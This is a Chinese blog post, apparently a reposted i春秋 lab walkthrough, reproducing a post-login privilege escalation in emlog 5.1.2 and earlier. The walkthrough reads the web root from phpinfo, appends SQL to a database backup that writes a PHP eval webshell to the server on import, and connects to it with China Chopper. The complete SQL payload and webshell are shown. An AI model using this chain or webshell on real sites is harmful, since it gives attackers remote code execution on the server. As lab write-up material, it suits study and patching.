安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)
Posted 小狐狸FM
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)相关的知识,希望对你有一定的参考价值。
前言
在提升后台权限之前,需要拥有后台管理员的账户
一、实验环境
环境 | 版本 |
---|---|
操作机 | Windows XP |
emlog版本 | 小于等于5.1.2 |
管理员账户 | 管理员密码 |
---|---|
admin | password |
二、漏洞复现
[1]. 获取系统路径
使用用户名
admin
密码password
登录后台
访问
http://127.0.0.1/emlog/admin?action=phpinfo
script_filename
为当前执行脚本的系统路径,
可以发现emlog
网站是搭建在目标服务器的C:/WWW
下,之后通过sql命令在C:/WWW/emlog
中创建一个一句话木马文件达到连接shell的目的
[2]. 下载sql备份
- 在
.sql
的数据库备份文件末尾添加sql
语句- 作用是在数据库中创建一个test表name字段来存储一句话木马,并将一句话木马输出保存为一个
.php
文件
drop table if exists test; --创建test表
create table test(name varchar(100)); --创建test表的name字段,name字段为可变长字符串类型
insert into test (name) values ('<?php @eval($_POST["cmd"]);?>'); --为name字段赋值
select name from test into outfile "C:/WWW/emlog/test.php"; --查询test表name字段的值,并输出到文件test.php中
[3]. 导入sql备份
导入之前的
.sql
备份文件
在导入sql备份时将会执行之前添加在末尾的sql语句,在服务器生成一句话木马文件
C:\\WWW\\emlog\\test.php
[4]. 连接shell
菜刀连接一句话木马
以上是关于安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)的主要内容,如果未能解决你的问题,请参考以下文章
安全-Wordpress 小于等于4.6.1版本任意代码执行漏洞复现(i春秋)
安全-EmpireCMS 小于等于7.5版本后台XSS漏洞复现
安全-Fastjson 小于等于1.2.24版本代码执行漏洞复现(vulhub)